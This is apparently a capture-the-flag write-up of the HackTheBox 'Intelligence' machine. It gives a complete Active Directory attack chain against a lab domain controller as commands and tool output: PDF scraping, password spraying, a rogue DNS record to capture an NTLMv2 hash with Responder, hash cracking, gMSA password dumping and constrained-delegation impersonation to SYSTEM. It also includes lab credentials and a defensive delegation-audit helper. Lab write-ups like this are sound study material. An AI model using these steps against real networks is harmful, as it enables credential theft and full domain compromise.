Intelligence - [HTB]

Marmeus

Introduction

Intelligence is a Windows Active Directory machine from HackTheBox where the attacker has to enumerate public files in order to find some usernames and the credentials needed to obtain the user flag. Then, they have to add a fake DNS record to the domain's DNS zone in order to obtain Ted's credentials. Finally, the attacker has to obtain a gMSA password, which allows them to impersonate a Domain Admin and obtain the root flag.

Enumeration

As always, let's start by finding all open ports on the machine with nmap.

kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.248
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 17:21 EDT
Nmap scan report for 10.10.10.248
Host is up (0.041s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49702/tcp open  unknown
49714/tcp open  unknown
55797/tcp open  unknown
57669/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 56.13 seconds

Then, we continue with a deeper scan of each open port, getting more information about every service.

kali@kali:~/Documents/HTB/Intelligence$ sudo nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49685,49686,49704,49708 -T5 -Pn -oN PortsDepth.txt 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.044s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-08 04:05:09Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:39+00:00; +7h00m02s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-07-08T04:06:38+00:00; +7h00m03s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m02s, deviation: 0s, median: 7h00m02s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-08T04:05:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  7 17:06:37 2021 -- 1 IP address (1 host up) scanned in 96.96 seconds

Looking at the web page there are some documents that we can download.

Intelligence web page

Both of them have usernames stored in the metadata fields. However, we cannot do much with only two names.

kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator
Creator                         : William.Lee
Creator                         : Jose.Williams

Nonetheless, under the documents directory there seem to be more files, all following the same naming pattern but with a different date.

In order to download them all, I created the following script.

import os
import requests

# Documents follow the pattern 2020-MM-DD-upload.pdf, so try every date of 2020
URL_BASE = "http://10.10.10.248/documents/2020-{:02d}-{:02d}-upload.pdf"

for month in range(1, 13):
    for day in range(1, 32):
        url = URL_BASE.format(month, day)
        print(url)
        response = requests.get(url)
        # Only existing documents answer 200; save them under their original name
        if response.status_code == 200:
            with open(os.path.basename(url), "wb") as f:
                f.write(response.content)

You only need to execute the following commands in order to obtain a list of all the users.

kali@kali:~/Documents/HTB/Intelligence$ python obtainPDFs.py
kali@kali:~/Documents/HTB/Intelligence$ exiftool 2020-* | grep Creator | awk '{print $3}' | sort -u > users.txt

Furthermore, inside the document 2020-06-04-upload.pdf there is the following text.

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

Exploitation

We can find out which user the password belongs to thanks to crackmapexec.

kali@kali:~/Documents/HTB/Intelligence$ crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 

Now we can list the shared folders and see which ones this user can read.

kali@kali:~/Documents/HTB/Intelligence$ smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248
[+] IP: 10.10.10.248:445        Name: intelligence.htb                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        IT                                                      READ ONLY
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

Under the Users share we can retrieve the user flag.

kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/Users
smb: \Tiffany.Molina\Desktop\> dir
  .                                  DR        0  Sun Apr 18 20:51:46 2021
  ..                                 DR        0  Sun Apr 18 20:51:46 2021
  user.txt                           AR       34  Wed Jul 21 12:50:12 2021

Privilege escalation 1

Under the IT share we can retrieve a PowerShell script.

kali@kali:~/Documents/HTB/Intelligence$ smbclient -U "Tiffany.Molina%NewIntelligenceCorpUser9876" //10.10.10.248/IT
smb: \> dir
  .                                   D        0  Sun Apr 18 20:50:55 2021
  ..                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

                3770367 blocks of size 4096. 1460519 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)

The script queries Active Directory for every DNS record in the domain's AD-integrated zone whose name starts with "web". Then, it requests each of those hosts over HTTP, authenticating with the credentials of the account that runs the scheduled task.

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory 
# Every DNS record in the AD-integrated zone whose name starts with "web"
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
	try {
		# -UseDefaultCredentials authenticates to the host with the task's own account
		$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
		if($request.StatusCode -ne 200) {
			Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
		}
	} catch {}
}

Hence, since any authenticated user can create records in the AD-integrated DNS zone, we can add a "web" record pointing to our own host and capture the credentials the script sends with Responder.

In order to add the record we need to synchronise Kali's clock with the server's clock (Kerberos authentication requires it) and execute dnstool.py from krbrelayx.

kali@kali:~/Documents/HTB/Intelligence$ sudo ntpdate 10.10.10.248 
kali@kali:~/Documents/HTB/Intelligence$ python3 dnstool.py -u "intelligence\Tiffany.Molina" -p NewIntelligenceCorpUser9876 -a add -t A -r webMarmeus.intelligence.htb -d 10.10.14.245 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/media/sf_2_MisPostsBlog/HTB/Intelligence/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

Then, we need to run Responder and wait up to 10 minutes for the scheduled task to fire and hand over the credential.

kali@kali:~/Documents/HTB/Intelligence$ sudo responder -I tun0 -A 
[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:9751b32b8379208d[...]

What Responder captured is a NetNTLMv2 challenge-response, not the password itself, so with hashcat (mode 5600) we can crack it offline and recover the plaintext password.

kali@kali:~/Documents/HTB/Intelligence$ hashcat -m 5600 tedHash.txt /usr/share/wordlists/rockyou.txt
[...]
TED.GRAVES::intelligence:9751b32b8379208d:4d13215c35da7ab5751cc22bf9055653:[...]:Mr.Teddy

Privilege escalation 2

After trying a lot of stuff, it turns out that Ted's credentials are enough to read the password of a gMSA (group Managed Service Account), which gMSADumper extracts for us.

kali@kali:~/Documents/HTB/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
kali@kali:~/Documents/HTB/Intelligence/gMSADumper$ python3 ./gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::47e89a6afd68e3872ef1acaf91d0b2f7

The account svc_int$ has the msDS-AllowedToDelegateTo attribute set, i.e. constrained delegation to a service on the domain controller, which could allow us to impersonate a Domain Admin against that service.

kali@kali:~/Documents/HTB/Intelligence$ sudo ldapsearch -x -h 10.10.10.248 -D "intelligence\TED.GRAVES" -w "Mr.Teddy" -b "CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb" 
[...]
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
[...]
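
The risk behind that attribute is easier to audit with a small helper. The following Python is an added example, not code from the writeup or from any tool it uses: it classifies an account's delegation configuration from its LDAP attributes and lists which principals it could impersonate, checking for the two mitigations that block S4U impersonation (Protected Users membership and the "account is sensitive and cannot be delegated" flag). The entries are constructed, and svc_int$'s userAccountControl flags (protocol transition enabled) are an assumption consistent with getST.py succeeding below.

```python
# userAccountControl bits (MS-ADTS 2.2.16)
NORMAL_ACCOUNT = 0x200
WORKSTATION_TRUST_ACCOUNT = 0x1000
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition: S4U2Self yields a forwardable ticket


def classify_delegation(uac, allowed_to):
    """Return none, unconstrained, constrained or constrained-protocol-transition."""
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if not allowed_to:
        return "none"
    if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-protocol-transition"
    return "constrained"


def can_be_impersonated(uac, member_of):
    """Protected Users membership or the NOT_DELEGATED bit blocks S4U impersonation."""
    if uac & NOT_DELEGATED:
        return False
    return not any(g.lower().startswith("cn=protected users,") for g in member_of)


def delegation_findings(entries):
    """Pair each protocol-transition account with every principal it could impersonate."""
    findings = []
    for d in entries:
        spns = d.get("msDS-AllowedToDelegateTo", [])
        if classify_delegation(d["userAccountControl"], spns) != "constrained-protocol-transition":
            continue
        for victim in entries:
            if victim is d or not can_be_impersonated(victim["userAccountControl"], victim.get("memberOf", [])):
                continue
            for spn in spns:
                findings.append(f"{d['sAMAccountName']} can get a ticket for {spn} as {victim['sAMAccountName']}")
    return findings


# Constructed sample modelled on the writeup's accounts; svc_int$'s flags are assumed
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc_int$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["WWW/dc.intelligence.htb"]},
    {"sAMAccountName": "administrator", "userAccountControl": NORMAL_ACCOUNT, "memberOf": []},
    {"sAMAccountName": "Ted.Graves", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED},
]
```

On a real domain the entries would come from an LDAP query for sAMAccountName, userAccountControl, memberOf and msDS-AllowedToDelegateTo; in the sample only administrator is reported, because Ted.Graves carries the NOT_DELEGATED flag.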

In order to obtain a service ticket for that service as Administrator we need to synchronise the clocks once more and execute getST.py with the gMSA's NTLM hash.

kali@kali:~/Documents/HTB/Intelligence$ sudo net time set -S 10.10.10.248
kali@kali:~/Documents/HTB/Intelligence$ getST.py intelligence.htb/svc_int$ -spn www/dc.intelligence.htb -hashes :47e89a6afd68e3872ef1acaf91d0b2f7 -impersonate administrator
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache

Now, using that ticket with atexec.py, we are able to execute commands as nt authority\system on the domain controller and read the root flag.

kali@kali:~/Documents/HTB/Intelligence$ export KRB5CCNAME=administrator.ccache
kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'whoami'
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \EjMKGuQK
[*] Running task \EjMKGuQK
[*] Deleting task \EjMKGuQK
[*] Attempting to read ADMIN$\Temp\EjMKGuQK.tmp
nt authority\system

kali@kali:~/Documents/HTB/Intelligence$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \usqqykxq
[*] Running task \usqqykxq
[*] Deleting task \usqqykxq
[*] Attempting to read ADMIN$\Temp\usqqykxq.tmp
[CENSORED]